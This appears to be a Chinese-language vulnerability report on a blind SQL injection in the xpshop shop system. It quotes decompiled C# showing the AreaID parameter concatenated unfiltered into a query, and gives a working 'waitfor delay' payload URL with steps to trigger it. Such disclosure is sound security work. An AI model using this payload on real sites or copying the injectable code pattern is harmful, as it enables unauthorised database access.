xpshop系统sql盲注一处

### 简要描述： ### 详细说明： 漏洞位置:xpshop.webui.checkout ``` protected void Page_Load(object sender, EventArgs e) { this.sid = Utils.ReqIntParams("sid", -1); if (base.CurrentUser == null) { base.Response.Redirect(string.Concat(new object[] { "Login.aspx?ReturnUrl=/", WebUIBase.ShopFolder, "Checkout.aspx?sid=", this.sid })); } else { string text = Utils.ReqStrParams("type", ""); string text2 = Utils.ReqStrParams("Action", ""); if (text.Length > 0 && text2.Length > 0) { string text3 = text2; if (text3 != null) { if (!(text3 == "GetZtds")) { if (!(text3 == "GetShipps")) { if (!(text3 == "GetShoppingCart")) { if (!(text3 == "GetAdvancePayment")) { if (!(text3 == "UseCoupon")) { if (text3 == "CancleCoupon") { this.CancleCoupon(); } } else { this.UseCoupon(); } } else if (base.CurrentUser != null && base.CurrentUser.Name != "anonymous") { this.Session["CurrentUser"] = this.memberDB.GetMemberDetails(base.CurrentUser.MemberID); base.Response.Write(base.CurrentUser.AdvancePayment); } else { base.Response.Write("0"); } } else { SqlDataReader items = this.shoppingCartDB.GetItems(this.shoppingCartDB.GetShoppingCartId()); string s = XpShopJson.DrtToJSON(items, "Cart"); items.Close(); base.Response.Write(s); } } else { this.GetShipps(); } } else { this.GetZtds(); } } base.Response.End(); } ``` 漏洞在这个函数this.GetZtds();： ``` private void GetZtds() { SqlDataReader ztds = new ZtdDB().GetZtds2(base.Request.QueryString["AreaID"]); string s = XpShopJson.DrtToJSON(ztds, "Ztd"); base.Response.Write(s); } ``` 继续跟进GetZtds2: public SqlDataReader GetZtds2(string areaID) { string cmdText = string.Concat(new string[] { "SELECT * FROM Ztd WHERE ", Utils.dbo, "f_GetShippingAreaNo(AreaID) Like (Cast(", Utils.dbo, "f_GetShippingAreaNo(", areaID, ") As nvarchar(30)) + '%') ORDER BY ZtdID" }); return XpShopDB.ExecuteReader(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } </code> 可以发现根本没有过滤，然而试了一下好像不能报错注入，估计只能盲注了（mssql并不太会，所以就没有继续研究了。） 给个payload： /CheckOut.aspx?sid=0&type=1&Action=GetZtds&AreaID=1) As nvarchar(30)));waitfor delay '0:0:3'-- 利用方法：先注册一个会员，然后访问：http://localhost/CheckOut.aspx?sid=0&type=1&Action=GetZtds&AreaID=1) As nvarchar(30)));waitfor delay '0:0:3'-- ### 漏洞证明： http://localhost/CheckOut.aspx?sid=0&type=1&Action=GetZtds&AreaID=1) As nvarchar(30)));waitfor delay '0:0:3'-- [<img src="https://images.seebug.org/upload/201510/151326337905e2991bef82334b7b3e21f707c679.jpg" alt="blind.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/151326337905e2991bef82334b7b3e21f707c679.jpg)